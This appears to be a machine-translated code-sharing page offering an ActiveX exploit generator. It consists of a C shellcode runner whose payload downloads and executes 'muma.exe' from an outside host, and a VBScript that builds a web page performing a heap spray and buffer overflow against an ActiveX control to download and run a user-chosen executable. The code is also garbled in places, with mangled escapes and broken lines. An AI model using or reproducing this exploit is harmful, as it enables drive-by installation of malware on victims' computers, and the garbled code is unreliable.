ActiveX vulnerability Generic exploit VBS revision _VBS

C + + code

Copy Code code as follows:

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] =
"\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03"
"\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74"
"\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e"
"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03"
"\XC5\XC3\X75\X72\X6C\X6D\X6F\X6E\X2E\X64\X6C\X6C\X00\X43\X3A\X5C"
"\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c"
"\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec"
"\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f"
"\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb"
"\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83"
"\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff"
"\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"
"Http://fenggou.net/muma.exe";

int main ()
{
void (* code) (); Converts the shellcode to a null parameter, returns an empty function pointer, and calls the
* (int *) & code = Shellcode;
Code ();
}

VBS code

Copy Code code as follows:

Exeurl = InputBox ("Please input your want down&exec URL:", "Input", "Http://jb51.net/muma.exe")
If Exeurl <> "" Then
Code= "\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f \xbe\x14\x28\x38\xf2\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\ X0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c\ X55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\ x40\x34\x8d\x40\x7c\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x3c\xff\ Xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb\x24\ X53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\ X73\xe8\x40\xff\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff "&unicode (EXEURL&AMP;CHR) &Chr (00))
Function Unicode (STR1)
Dim str,temp
str = ""
For I=1 to Len (str1)
temp = Hex (AscW (Mid (str1,i,1))
If Len (temp) < 5 Then temp = right ("0000" &temp, 2)
str = str & "\x" & Temp
Next
Unicode = str
End Function
function Replaceregex (str)
Set Regex=new REGEXP
regex.pattern= "\\x (..) \\x (..) "
Regex. Ignorecase=true
Regex.global=true
Matches=regex.replace (str, "%u$2$1")
Replaceregex=matches
End Function
Set Fso=createobject ("Scripting.FileSystemObject")
If FSO. FileExists ("jb51.htm") Then
Fso.deletefile "Jb51.htm", True
End If
Set Files=fso.opentextfile ("Jb51.htm", 8,true)
Files.writeline "Files.writeline "<title>Sina</title>"
Files.writeline "<object classid=" "clsid:8ef2a07c-6e69-4144-96aa-2247d892a73d" "id= ' target ' ></object> "
Files.writeline "<body>"
Files.writeline "<script language=" "JavaScript" ">"
Files.writeline "var shellcode = unescape (" "" &replaceregex (Code) & ""); "
Files.writeline "var bigblock = unescape (" "%u9090%u9090"); "
Files.writeline "var headersize = 20;"
Files.writeline "var slackspace = headersize+shellcode.length;"
Files.writeline "while (bigblock.length<slackspace) Bigblock+=bigblock;"
Files.writeline "Fillblock = bigblock.substring (0, slackspace);"
Files.writeline "block = bigblock.substring (0, bigblock.length-slackspace);"
Files.writeline "while (block.length+slackspace<0x40000) block = Block+block+fillblock;"
Files.writeline "Memory = new Array ();"
Files.writeline "for" (x=0; x<300; x + +) memory[x] = block +shellcode; "
Files.writeline "var buffer = ';"
Files.writeline "while (Buffer.length < 218) buffer+= ' \x0a\x0a\x0a\x0a ';"
Files.writeline "target. METHOD1 (buffer); "
Files.writeline "</script>"
Files.writeline "</body>"
Files.writeline "Files. Close
Set fso=nothing
End If